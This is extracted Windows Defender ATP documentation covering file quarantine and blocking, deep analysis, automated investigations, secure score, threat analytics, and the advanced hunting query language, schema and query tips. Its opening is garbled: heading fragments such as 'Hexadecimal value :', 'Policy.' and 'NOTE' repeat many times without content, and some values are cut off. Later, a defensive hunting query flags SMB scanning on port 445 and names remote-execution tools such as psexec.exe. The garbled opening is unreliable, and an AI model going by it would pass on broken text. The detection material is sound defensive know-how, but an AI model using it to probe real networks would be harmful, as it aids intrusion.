Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on
files, you can check activity details on the Action center.
IMPORTANT
You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is
complete, you'll get a detailed report that provides information about the behavior of the file.

was observed.
IMPORTANT
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the
last 30 days.
NOTE

1. Select the file you want to stop and quarantine. You can select a file from any of the following views or
use the Search box:

Pending - Shows the number of machines where the file is yet to be stopped and quarantined from.
This can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed
to see where the action failed.
IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the
removal of critical system files and files used by important applications.

You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation.
Run the following command on each machine where the file was quarantined.
NOTE

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled.
For more information, see Manage cloud–based protection.
time.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the
allow or block action.
NOTE

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search
box:

Submitting user - Shows who submitted the action on the file. You can view the comments provided
by the user by selecting the information icon.
NOTE

When a file is being blocked on the machine, the following notification is displayed to inform the user that the
file was blocked:
NOTE

1. Select the file you want to remove from the blocked list. You can select a file from any of the following
views or use the Search box:
3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the
organization.

The Action center provides information on actions that were taken on a machine or file. You’ll be able to view
the details on the last action that were taken on a file such as stopped and quarantined files or blocked files.
Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files
that are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To
enrich the data related to the file, you can submit the file for deep analysis.
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry
modifications, and communication with IPs. Deep analysis currently supports extensive analysis of portable
executable (PE ) files (including .exe and .dll files).
File view page, under a new Deep analysis summary section. The summary includes a list of observed
behaviors, some of which can indicate malicious activity, and observables, including contacted IPs and files
created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate
alerts.
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or
for any other reason where you suspect malicious behavior. This feature is available in the context of the file
view.
analysis.
NOTE
You can also manually submit a sample through the Malware Protection Center Portal if the file was not
observed on a Windows 10 machine, and wait for Submit for deep analysis button to become available.
NOTE
detailed report of observed behaviors and associated artifacts, such as files dropped on machines,
communication to IPs, and registry modifications.
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the
following views:
section
A progress bar is displayed and provides information on the different stages of the analysis. You can then view
the report when the analysis is done.
NOTE

View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that
was conducted on the file you submitted. This feature is available in the file view context.
Behaviors
Observables
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs
or applications).
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If
it is configured, then verify the policy setting allows sample collection before submitting the file again.
When sample collection is configured, then check the following registry value:

Type: DWORD
Hexadecimal value :
Policy.
Related topic
Overview of Automated investigations
The Windows Defender ATP service has a wide breadth of visibility on multiple machines. With this kind of optics,
the service generates a multitude of alerts. The volume of alerts generated can be challenging for a typical
security operations team to individually address.
To address this challenge, Windows Defender ATP uses Automated investigations to significantly reduce the
volume of alerts that need to be investigated individually. The Automated investigation feature leverages various
inspection algorithms, and processes used by analysts (such as playbooks) to examine alerts and take immediate
remediation action to resolve breaches. This significantly reduces alert volume, allowing security operations
experts to focus on more sophisticated threats and other high value initiatives.
The Automated investigations list shows all the investigations that have been initiated automatically and shows
other details such as its status, detection source, and the date for when the investigation was initiated.
Understand the Automated investigation flow

How the Automated investigation starts
Entities are the starting point for Automated investigations. When an alert contains a supported entity for
Automated investigation (for example, a file) that resides on a machine that has a supported operating system for
Automated investigation then an Automated investigation can start.
NOTE
Currently, Automated investigation only supports Windows 10, version 1803 or later. Some investigation playbooks, like
memory investigations, require Windows 10, version 1809 or later.
The alerts start by analyzing the supported entities from the alert and also runs a generic machine playbook to
see if there is anything else suspicious on that machine. The outcome and details from the investigation is seen in
the Automated investigation view.
Details of an Automated investigation
As the investigation proceeds, you'll be able to view the details of the investigation. Selecting a triggering alert
brings you to the investigation details view where you can pivot from the Investigation graph, Alerts,
Machines, Threats, Entities, and Log tabs.
In the Alerts tab, you'll see the alert that started the investigation.
The Machines tab shows where the alert was seen.
The Threats tab shows the entities that were found to be malicious during the investigation.
During an Automated investigation, details about each analyzed entity is categorized in the Entities tab. You'll be
able to see the determination for each entity type, such as whether it was determined to be malicious, suspicious,
or clean.
The Log tab reflects the chronological detailed view of all the investigation actions taken on the alert.
If there are pending actions on the investigation, the Pending actions tab will be displayed where you can
approve or reject actions.
How an Automated investigation expands its scope
While an investigation is running, any other alert generated from the machine will be added to an ongoing
Automated investigation until that investigation is completed. In addition, if the same threat is seen on other
machines, those machines are added to the investigation.
If an incriminated entity is seen in another machine, the Automated investigation will expand the investigation to
include that machine and a generic machine playbook will start on that machine. If 10 or more machines are
found during this expansion process from the same entity, then that expansion action will require an approval and
will be seen in the Pending actions view.
How threats are remediated
Depending on how you set up the machine groups and their level of automation, the Automated investigation will
either require user approval (default) or automatically remediate threats.
You can configure the following levels of automation:
AUTOMATION LEVEL DESCRIPTION
Not protected Machines will not get any automated investigations run on
them.
Semi - require approval for any remediation This is the default automation level.
An approval is needed for any remediation action.
Semi - require approval for non-temp folders remediation An approval is required on files or executables that are not in
temporary folders.
Files or executables in temporary folders, such as the user's

download folder or the user's temp folder, will automatically
be remediated if needed.
Semi - require approval for core folders remediation An approval is required on files or executables that are in the
operating system directories such as Windows folder and
Program files folder.
Files or executables in all other folders will automatically be

remediated if needed.
Full - remediate threats automatically All remediation actions will be performed automatically.
For more information on how to configure these automation levels, see Create and manage machine groups.
The default machine group is configured for semi-automatic remediation. This means that any malicious entity
that needs to be remediated requires an approval and the investigation is added to the Pending actions section,
this can be changed to fully automatic so that no user approval is needed.
When a pending action is approved, the entity is then remediated and this new state is reflected in the Entities
tab of the investigation.
Related topic
Learn about the automated investigations dashboard
Learn about the automated investigations dashboard
By default, the Automated investigations list displays investigations initiated in the last week. You can also choose
to select other time ranges from the drop-down menu or specify a custom range.
NOTE
If your organization has implemented role-based access to manage portal access, only authorized users or user groups who
have permission to view the machine or machine group will be able to view the entire investigation.
Use the Customize columns drop-down menu to select columns that you'd like to show or hide.
From this view, you can also download the entire list in CSV format using the Export button, specify the number
of items to show per page, and navigate between pages. You also have the flexibility to filter the list based on your
preferred criteria.
Filters
You can use the following operations to customize the list of Automated investigations displayed:
Triggering alert
The alert the initiated the Automated investigation.
Status
An Automated investigation can be in one of the following status:
STATUS DESCRIPTION
No threats found No malicious entities found during the investigation.
Failed A problem has interrupted the investigation, preventing it

from completing.
Partially remediated A problem prevented the remediation of some malicious

entities.
Pending action Remediation actions require review and approval.
Waiting for machine Investigation paused. The investigation will resume as soon as
the machine is available.
STATUS DESCRIPTION
Queued Investigation has been queued and will resume as soon as

other remediation activities are completed.
Running Investigation ongoing. Malicious entities found will be

remediated.
Remediated Malicious entities found were successfully remediated.
Terminated by system Investigation was stopped by the system.
Terminated by user A user stopped the investigation before it could complete.
Partially investigated Entities directly related to the alert have been investigated.
However, a problem stopped the investigation of collateral
entities.
Detection source
Source of the alert that initiated the Automated investigation.
Threat
The category of threat detected during the Automated investigation.
Tags
Filter using manually added tags that capture the context of an Automated investigation.
Machines
You can filter the Automated investigations list to zone in a specific machine to see other investigations related to
the machine.
Machine groups
Apply this filter to see specific machine groups that you might have created.
Comments
Select between filtering the list between Automated investigations that have comments and those that don't.
Analyze Automated investigations

You can view the details of an Automated investigation to see information such as the investigation graph, alerts
associated with the investigation, the machine that was investigated, and other information.
In this view, you'll see the name of the investigation, when it started and ended.
The progress ring shows two status indicators:
Orange ring - shows the pending portion of the investigation
Green ring - shows the running time portion of the investigation
In the example image, the automated investigation started on 10:26:59 AM and ended on 10:56:26 AM. Therefore,
the entire investigation was running for 29 minutes and 27 seconds.
The pending time of 16 minutes and 51 seconds reflects two possible pending states: pending for asset (for
example, the device might have disconnected from the network) or pending for approval.
From this view, you can also view and add comments and tags about the investigation.
Investigation page
The investigation page gives you a quick summary on the status, alert severity, category, and detection source.
You'll also have access to the following sections that help you see details of the investigation with finer granularity:
Investigation graph
Alerts
Machines
Threats
Entities
Log
Pending actions
NOTE
The Pending actions tab is only displayed if there are actual pending actions.
Pending actions history
NOTE
The Pending actions history tab is only displayed when an investigation is complete.
In any of the sections, you can customize columns to further expand to limit the details you see in a section.
Investigation graph
The investigation graph provides a graphical representation of an Automated investigation. All investigation
related information is simplified and arranged in specific sections. Clicking on any of the icons brings you the
relevant section where you can view more information.
Alerts
Shows details such as a short description of the alert that initiated the Automated investigation, severity, category,
the machine associated with the alert, user, time in queue, status, investigation state, and who the investigation is
assigned to.
Additional alerts seen on a machine can be added to an Automated investigation as long as the investigation is
ongoing.
Selecting an alert using the check box brings up the alerts details pane where you have the option of opening the
alert page, manage the alert by changing its status, see alert details, Automated investigation details, related
machine, logged-on users, and comments and history.
Clicking on an alert title brings you the alert page.
Machines
Shows details the machine name, IP address, group, users, operating system, remediation level, investigation
count, and when it was last investigated.
Machines that show the same threat can be added to an ongoing investigation and will be displayed in this tab. If
10 or more machines are found during this expansion process from the same entity, then that expansion action will
require an approval and will be seen in the Pending actions view.
Selecting a machine using the checkbox brings up the machine details pane where you can see more information
such as machine details and logged-on users.
Clicking on an machine name brings you the machine page.
Threats
Shows details related to threats associated with this investigation.
Entities
Shows details about entities such as files, process, services, drives, and IP addresses. The table details such as the
number of entities that were analyzed. You'll gain insight into details such as how many are remediated, suspicious,
or determined to be clean.
Log
Gives a chronological detailed view of all the investigation actions taken on the alert. You'll see the action type,
action, status, machine name, description of the action, comments entered by analysts who may have worked on
the investigation, execution start time, duration, pending duration.
As with other sections, you can customize columns, select the number of items to show per page, and filter the log.
Available filters include action type, action, status, machine name, and description.
You can also click on an action to bring up the details pane where you'll see information such as the summary of
the action and input data.
Pending actions history
This tab is only displayed when an investigation is complete and shows all pending actions taken during the
investigation.
Pending actions
If there are pending actions on an Automated investigation, you'll see a pop up similar to the following image.
When you click on the pending actions link, you'll be taken to the pending actions page. You can also navigate to
the page from the navigation page by going to Automated investigation > Pending actions.
The pending actions view aggregates all investigations that require an action for an investigation to proceed or be
completed.
Use the Customize columns drop-down menu to select columns that you'd like to show or hide.
From this view, you can also download the entire list in CSV format using the Export feature, specify the number
of items to show per page, and navigate between pages.
Pending actions are grouped together in the following tabs:
Quarantine file
Remove persistence
Stop process
Expand pivot
Quarantine service
NOTE
The tab will only appear if there are pending actions for that category.
Approve or reject an action

You'll need to manually approve or reject pending actions on each of these categories for the automated actions to
proceed.
Selecting an investigation from any of the categories opens a panel where you can approve or reject the
remediation. Other details such as file or service details, investigation details, and alert details are displayed.
From the panel, you can click on the Open investigation page link to see the investigation details.
You also have the option of selecting multiple investigations to approve or reject actions on multiple investigations.
Related topic
Investigate Windows Defender ATP alerts
Overview of Secure score in Windows Defender
Security Center
Applies to:
The Secure score dashboard expands your visibility into the overall security posture of your organization. From
this dashboard, you'll be able to quickly assess the security posture of your organization, see machines that require
attention, as well as recommendations for actions to further reduce the attack surface in your organization - all in
one place. From there you can take action based on the recommended configuration baselines.
IMPORTANT
This feature is available for machines on Windows 10, version 1703 or later.
The Secure score dashboard displays a snapshot of:

Microsoft secure score
Secure score over time
Top recommendations
Improvement opportunities
Microsoft secure score
The Microsoft secure score tile is reflective of the sum of all the Windows Defender security controls that are
configured according to the recommended baseline and Office 365 controls. It allows you to drill down into each
portal for further analysis. You can also improve this score by taking the steps in configuring each of the security
controls in the optimal settings.
Each Windows Defender security control contributes 100 points to the score. The total number is reflective of the
score potential and calculated by multiplying the number of supported security controls (Windows Defender
security controls pillars) by the maximum points that each pillar contributes (maximum of 100 points for each
pillar).
The Office 365 Secure Score looks at your settings and activities and compares them to a baseline established by
Microsoft. For more information, see Introducing the Office 365 Secure Score.
In the example image, the total points for the Windows security controls and Office 365 add up to 602 points.
You can set the baselines for calculating the score of Windows Defender security controls on the Secure score
dashboard through the Settings. For more information, see Enable Secure score security controls.
Secure score over time

You can track the progression of your organizational security posture over time using this tile. It displays the
overall score in a historical trend line enabling you to see how taking the recommended actions increase your
overall security posture.
You can mouse over specific date points to see the total score for that security control is on a specific date.
Top recommendations
Reflects specific actions you can take to significantly increase the security stance of your organization and how
many points will be added to the secure score if you take the recommended action.
Improvement opportunities
Improve your score by taking the recommended improvement actions listed on this tile. The goal is to reduce the
gap between the perfect score and the current score for each control.
Clicking on the affected machines link at the top of the table takes you to the Machines list. The list is filtered to
reflect the list of machines where improvements can be made.
Within the tile, you can click on each control to see the recommended optimizations.
Clicking the link under the Misconfigured machines column opens up the Machines list with filters applied to
show only the list of machines where the recommendation is applicable. You can export the list in Excel to create a
target collection and apply relevant policies using a management solution of your choice.
Related topic
Threat analytics
Threat analytics for Spectre and Meltdown
Threat analytics
Applies to:
Cyberthreats are emerging more frequently and prevalently. It is critical for organizations to be able to quickly
assess their security posture, including impact, and organizational resilience in the context of specific emerging
threats.
Threat Analytics is a set of interactive reports published by the Windows Defender ATP research team as soon as
emerging threats and outbreaks are identified. The reports help you the assess impact of threats in your
environment and provides recommended actions to contain, increase organizational resilience, and prevent specific
threats.
NOTE
The number of resolved alerts indicates how quickly your organization responds to alerts associated with a threat. Ideally, the
chart should be showing alerts being resolved within a few days.
Each threat report provides a summary to describe details such as where the threat is coming from, where it's been
seen, or techniques and tools that were used by the threat.
The dashboard shows the impact in your organization through the following tiles:
Machines with alerts - shows the current distinct number of impacted machines in your organization
Machines with alerts over time - shows the distinct number of impacted over time
Mitigation recommendations - lists the measurable mitigations and the number of machines that do not have
each of the mitigations in place
Mitigation status - shows the number of mitigated and unmitigated machines. Machines are considered
mitigated if they have all the measurable mitigations in place.
Mitigation status over time - shows the distinct number of machines that have been mitigated, unmitigated, and
unavailable over time
Organizational impact
You can assess the organizational impact of a threat using the Machines with alerts and Machines with alerts
over time tiles.
A machine is categorized as Active if there is at least 1 alert associated with that threat and Resolved if all alerts
associated with the threat on the machine are resolved.
The Machine with alerts over time, shows the number of distinct machines with Active and Resolved alerts
over time. The number of resolved alerts indicates how quickly your organization responds to alerts associated
with a threat. Ideally, the chart should be showing alerts being resolved within a few days.
Organizational resilience
The Mitigation recommendations section provides specific actionable recommendations to improve your
visibility into this threat and increase your organizational resilience.
The Mitigation status and Mitigation status over time shows the endpoint configuration status assessed based
on the recommended mitigations.
IMPORTANT
The chart only reflects mitigations that are measurable and where an evaluation can be made on the machine state as
being compliant or non-compliant. There can be additional mitigations or compliance actions that currently cannot be
computed or measured that are not reflected in the charts and are covered in the threat description under Mitigation
recommendations section.
Even if all mitigations were measurable, there is no absolute guarantee of complete resilience but reflects the best possible
actions that need to be taken to improve resiliency.
NOTE
The Unavailable category indicates that there is no data available from the specific machine yet.
Related topics
Threat analytics for Spectre and Meltdown
Overview of advanced hunting
Applies to:
Advanced hunting allows you to hunt for possible threats across your organization using a powerful search and
query tool. You can also create custom detection rules based on the queries you created and surface alerts in
Windows Defender Security Center.
With advanced hunting, you can take advantage of the following capabilities:
Powerful query language with IntelliSense - Built on top of a query language that gives you the flexibility
you need to take hunting to the next level.
Query the stored telemetry - The telemetry data is accessible in tables for you to query. For example, you can
query process creation, network communication, and many other event types.
Links to portal - Certain query results, such as machine names and file names are actually direct links to the
portal, consolidating the Advanced hunting query experience and the existing portal investigation experience.
Query examples - A welcome page provides examples designed to get you started and get you familiar with
the tables and the query language.
In this section
TOPIC DESCRIPTION
Query data using Advanced hunting Learn how to use the basic or advanced query examples to
search for possible emerging threats in your organization.
Custom detections With custom detections, you can create custom queries to
monitor events for any kind of behavior such as suspicious or
emerging threats.
Query data using Advanced hunting in Windows
Defender ATP
To get you started in querying your data, you can use the basic or Advanced query examples that have some
preloaded queries for you to understand the basic query syntax.
Use advanced hunting to query data

A typical query starts with a table name followed by a series of operators separated by |.
In the following example, we start with the table name ProcessCreationEvents and add piped elements as
needed.
First, we define a time filter to review only records from the previous seven days.
We then add a filter on the FileName to contain only instances of powershell.exe.
Afterwards, we add a filter on the ProcessCommandLine.
Finally, we project only the columns we're interested in exploring and limit the results to 100 and click Run query.
You have the option of expanding the screen view so you can focus on your hunting query and related results.
Use operators
The query language is very powerful and has a lot of available operators, some of them are -
where - Filter a table to the subset of rows that satisfy a predicate.
summarize - Produce a table that aggregates the content of the input table.
join - Merge the rows of two tables to form a new table by matching values of the specified column(s) from
each table.
count - Return the number of records in the input record set.
top - Return the first N records sorted by the specified columns.
limit - Return up to the specified number of rows.
project - Select the columns to include, rename or drop, and insert new computed columns.
extend - Create calculated columns and append them to the result set.
makeset - Return a dynamic (JSON ) array of the set of distinct values that Expr takes in the group
find - Find rows that match a predicate across a set of tables.
To see a live example of these operators, run them as part of the Get started section.
Access query language documentation

For more information on the query language and supported operators, see Query Language.
Use exposed tables in Advanced hunting

The following tables are exposed as part of Advanced hunting:
AlertEvents - Alerts on Windows Defender Security Center
MachineInfo - Machine information, including OS information
MachineNetworkInfo - Network properties of machines, including adapters, IP and MAC addresses, as well
as connected networks and domains
ProcessCreationEvents - Process creation and related events
NetworkCommunicationEvents - Network connection and related events
FileCreationEvents - File creation, modification, and other file system events
RegistryEvents - Creation and modification of registry entries
LogonEvents - Login and other authentication events
ImageLoadEvents - DLL loading events
MiscEvents - Multiple event types, such as process injection, creation of scheduled tasks, and LSASS access
attempts
These tables include data from the last 30 days.
Use shared queries

Shared queries are prepopulated queries that give you a starting point on running queries on your organization's
data. It includes a couple of examples that help demonstrate the query language capabilities.
You can save, edit, update, or delete queries.

Save a query
You can create or modify a query and save it as your own query or share it with users who are in the same tenant.
1. Create or modify a query.
2. Click the Save query drop-down button and select Save as.
3. Enter a name for the query.
4. Select the folder where you'd like to save the query.
Shared queries - Allows other users in the tenant to access the query
My query - Accessible only to the user who saved the query
5. Click Save.
Update a query
These steps guide you on modifying and overwriting an existing query.
1. Edit an existing query.
2. Click the Save.
Delete a query
1. Right-click on a query you want to delete.
2. Select Delete and confirm that you want to delete the query.
Result set capabilities in Advanced hunting

The result set has several capabilities to provide you with effective investigation, including:
Columns that return entity-related objects, such as Machine name, Machine ID, File name, SHA1, User, IP, and
URL, are linked to their entity pages in Windows Defender Security Center.
You can right-click on a cell in the result set and add a filter to your written query. The current filtering options
are include, exclude or advanced filter, which provides additional filtering options on the cell value. These
cell values are part of the row set.
Filter results in Advanced hunting

In Advanced hunting, you can use the advanced filter on the output result set of the query. The filters provide an
overview of the result set where each column has it's own section and shows the distinct values that appear in the
column and their prevalence.
You can refine your query based on the filter by clicking the "+" or "-" buttons on the values that you want to
include or exclude and click Run query.
The filter selections will resolve as an additional query term and the results will be updated accordingly.
Public Advanced hunting query GitHub repository

Check out the Advanced hunting repository. Contribute and use example queries shared by our customers.
Related topic
Advanced hunting reference
Advanced hunting reference in Windows Defender
ATP
Applies to:
Advanced hunting column reference

To effectively build queries that span multiple tables, you need to understand the columns in the Advanced hunting
schema. The following table lists all the available columns, along with their data types and descriptions. This
information is also available in the schema representation in the Advanced hunting screen.
COLUMN NAME DATA TYPE DESCRIPTION
AccountDomain string Domain of the account
AccountName string User name of the account
AccountSid string Security Identifier (SID) of the account
ActionType string Type of activity that triggered the event
AdditionalFields string Additional information about the event

in JSON array format
AlertId string Unique identifier for the alert
AppGuardContainerId string Identifier for the virtualized container

used by Application Guard to isolate
browser activity
Category string Type of threat indicator or breach

activity identified by the alert
ClientVersion string Version of the endpoint agent or sensor

running on the machine
ComputerName string Fully qualified domain name (FQDN) of

the machine
ConnectedNetworks string Networks that the adapter is connected

to. Each JSON array contains the
network name, category (public, private
or domain), a description, and a flag
indicating if it’s connected publicly to
the internet.
DefaultGateways string Default gateway addresses in JSON

array format
DnsAddresses string DNS server addresses in JSON array

format
EventTime datetime Date and time when the event was

recorded
FileName string Name of the file that the recorded

action was applied to
FileOriginIp string IP address where the file was

downloaded from
FileOriginReferrerUrl string URL of the web page that links to the

downloaded file
FileOriginUrl string URL where the file was downloaded

from
FolderPath string Folder containing the file that the

recorded action was applied to
InitiatingProcessAccountDomain string Domain of the account that ran the

process responsible for the event
InitiatingProcessAccountName string User name of the account that ran the

process responsible for the event
InitiatingProcessAccountSid string Security Identifier (SID) of the account

that ran the process responsible for the
event
InitiatingProcessCommandLine string Command line used to run the process

that initiated the event
InitiatingProcessCreationTime datetime Date and time when the process that

initiated the event was started
InitiatingProcessFileName string Name of the process that initiated the

event
InitiatingProcessFolderPath string Folder containing the process (image

file) that initiated the event
InitiatingProcessId int Process ID (PID) of the process that

initiated the event
InitiatingProcessIntegrityLevel string Integrity level of the process that

initiated the event. Windows assigns
integrity levels to processes based on
certain characteristics, such as if they
were launched from an internet
download. These integrity levels
influence permissions to resources.
InitiatingProcessLogonId string Identifier for a logon session of the

process that initiated the event. This
identifier is unique on the same
machine only between restarts.
InitiatingProcessMd5 string MD5 hash of the process (image file)

that initiated the event
InitiatingProcessParentCreationTime datetime Date and time when the parent of the

process responsible for the event was
started
InitiatingProcessParentId int Process ID (PID) of the parent process

that spawned the process responsible
for the event
InitiatingProcessParentFileName string Name of the parent process that

spawned the process responsible for the
event
InitiatingProcessSha1 string SHA-1 of the process (image file) that

initiated the event
InitiatingProcessSha256 string SHA-256 of the process (image file) that

initiated the event. This field is usually
not populated—use the SHA1 column
when available.
InitiatingProcessTokenElevation string Token type indicating the presence or

absence of User Access Control (UAC)
privilege elevation applied to the
process that initiated the event
IPAddresses string JSON array containing all the IP

addresses assigned to the adapter,
along with their respective subnet prefix
and IP address space, such as public,
private, or link-local
Ipv4Dhcp string IPv4 address of DHCP server
Ipv6Dhcp string IPv6 address of DHCP server
IsAzureADJoined boolean Boolean indicator of whether machine is

joined to the Azure Active Directory
IsAzureInfoProtectionApplied boolean Indicates whether the file is encrypted

by Azure Information Protection
IsWindowsInfoProtectionApplied boolean Indicates whether Windows Information

Protection (WIP) policies apply to the
file
LocalIP string IP address assigned to the local

machine used during communication
LocalPort int TCP port on the local machine used

during communication
LocalIPType string Type of IP address, for example Public,

Private, Reserved, Loopback, Teredo,
FourToSixMapping, and Broadcast
LogonId string Identifier for a logon session. This

identifier is unique on the same
machine only between restarts.
LoggedOnUsers string List of all users that are logged on the

machine at the time of the event in
JSON array format
LogonType string Type of logon session, specifically:
- Interactive - User physically interacts

with the machine using the local
keyboard and screen
- Remote interactive (RDP) logons -

User interacts with the machine
remotely using Remote Desktop,
Terminal Services, Remote Assistance, or
other RDP clients
- Network - Session initiated when the

machine is accessed using PsExec or
when shared resources on the machine,
such as printers and shared folders, are
accessed
- Batch - Session initiated by scheduled

tasks
- Service - Session initiated by services

as they start
MacAddress string MAC address of the network adapter
MachineGroup string Machine group of the machine. This

group is used by role-based access
control to determine access to the
machine.
MachineId string Unique identifier for the machine in the

service
MD5 string MD5 hash of the file that the recorded

NetworkAdapterName string Name of the network adapter
NetworkAdapterStatus string Operational status of the network

adapter. For the possible values, refer to
this enumeration.
NetworkAdapterType string Network adapter type. For the possible

values, refer to this enumeration.
OSArchitecture string Architecture of the operating system

OSBuild string Build version of the operating system

OSPlatform string Platform of the operating system

running on the machine. This indicates
specific operating systems, including
variations within the same family, such
as Windows 10 and Windows 7.
OsVersion string Version of the operating system

PreviousRegistryKey string Original registry key of the registry

value before it was modified
PreviousRegistryValueData string Original data of the registry value

before it was modified
PreviousRegistryValueName string Original name of the registry value

PreviousRegistryValueType string Original data type of the registry value

ProcessCommandline string Command line used to create the new

process
ProcessCreationTime datetime Date and time the process was created
ProcessId int Process ID (PID) of the newly created

process
ProcessIntegrityLevel string Integrity level of the newly created

process. Windows assigns integrity
levels to processes based on certain
characteristics, such as if they were
launched from an internet downloaded.
These integrity levels influence
permissions to resources.
ProcessTokenElevation string Token type indicating the presence or

absence of User Access Control (UAC)
privilege elevation applied to the newly
created process
Protocol string IP protocol used, whether TCP or UDP
PublicIP string Public IP address used by the

onboarded machine to connect to the
Windows Defender ATP service. This
could be the IP address of the machine
itself, a NAT device, or a proxy.
RegistryKey string Registry key that the recorded action

was applied to
RegistryValueData string Data of the registry value that the

RegistryValueName string Name of the registry value that the

RegistryValueType string Data type, such as binary or string, of

the registry value that the recorded
RemoteComputerName string Name of the machine that performed a

remote operation on the affected
machine. Depending on the event being
reported, this name could be a fully-
qualified domain name (FQDN), a
NetBIOS name, or a host name without
domain information.
RemoteIP string IP address that was being connected to
RemoteIPType string Type of IP address, for example Public,

Private, Reserved, Loopback, Teredo,
FourToSixMapping, and Broadcast
RemotePort int TCP port on the remote device that was

being connected to
RemoteUrl string URL or fully qualified domain name

(FQDN) that was being connected to
ReportId long Event identifier based on a repeating

counter. To identify unique events, this
column must be used in conjunction
with the ComputerName and EventTime
columns.
Severity string Indicates the potential impact (high,

medium, or low) of the threat indicator
or breach activity identified by the alert
SensitivityLabel string Label applied to an email, file, or other

content to classify it for information
protection
SensitivitySubLabel string Sublabel applied to an email, file, or

other content to classify it for
information protection; sensitivity
sublabels are grouped under sensitivity
labels but are treated independently
SHA1 string SHA-1 of the file that the recorded

SHA256 string SHA-256 of the file that the recorded

action was applied to. This field is
usually not populated—use the SHA1
column when available.
RegistryMachineTag string Machine tag added through the

registry
Table string Table that contains the details of the

event
TunnelingType string Tunneling protocol, if the interface is

used for this purpose, for example 6to4,
Teredo, ISATAP, PPTP, SSTP, and SSH
Related topic
Query data using Advanced hunting
Advanced hunting query best practices Windows
Defender ATP
Applies to:
Performance best practices

The following best practices serve as a guideline of query performance best practices and for you to get faster
results and be able to run complex queries.
Use time filters first. Azure Kusto is highly optimized to utilize time filters. For more information, see Azure
Kusto.
Put filters that are expected to remove most of the data in the beginning of the query, following the time filter.
Use 'has' keyword over 'contains' when looking for full tokens.
Use looking in specific column rather than using full text search across all columns.
When joining between two tables - choose the table with less rows to be the first one (left-most).
When joining between two tables - project only needed columns from both sides of the join.
Query tips and pitfalls

Unique Process IDs
Process IDs are recycled in Windows and reused for new processes and therefore can't serve as a unique identifier
for a specific process. To address this issue, Windows Defender ATP created the time process. To get a unique
identifier for a process on a specific machine, use the process ID together with the process creation time.
So, when you join data based on a specific process or summarize data for each process, you'll need to use a
machine identifier (either MachineId or ComputerName), a process ID (ProcessId or InitiatingProcessId) and the
process creation time (ProcessCreationTime or InitiatingProcessCreationTime)
The following example query is created to find processes that access more than 10 IP addresses over port 445
(SMB ) - possibly scanning for file shares.
Example query:
NetworkCommunicationEvents
| where RemotePort == 445 and EventTime > ago(12h) and InitiatingProcessId !in (0, 4)
| summarize RemoteIPCount=dcount(RemoteIP) by ComputerName, InitiatingProcessId,
InitiatingProcessCreationTime, InitiatingProcessFileName
| where RemoteIPCount > 10
The query summarizes by both InitiatingProcessId and InitiatingProcessCreationTime - to make sure the query
looks at a single process, and not mixing multiple processes with the same process ID.
Using command line queries
Command lines may vary - when applicable, filter on file names and do fuzzy matching.
There are numerous ways to construct a command line to accomplish a task.
For example, a malicious attacker could specify the process image file name without a path, with full path, without
the file extension, using environment variables, add quotes, and others. In addition, the attacker can also change
the order of some parameters, add multiple quotes or spaces, and much more.
To create more durable queries using command lines, we recommended the following guidelines:
Identify the known processes (such as net.exe, psexec.exe, and others) by matching on the filename fields,
instead of filtering on the command line field.
When querying for command line arguments, don't look for an exact match on multiple unrelated arguments in
a certain order. Instead, use regular expressions or use multiple separate contains operators.
Use case insensitive matches. For example, use '=~', 'in~', 'contains' instead of '==', 'in' or 'contains_cs'
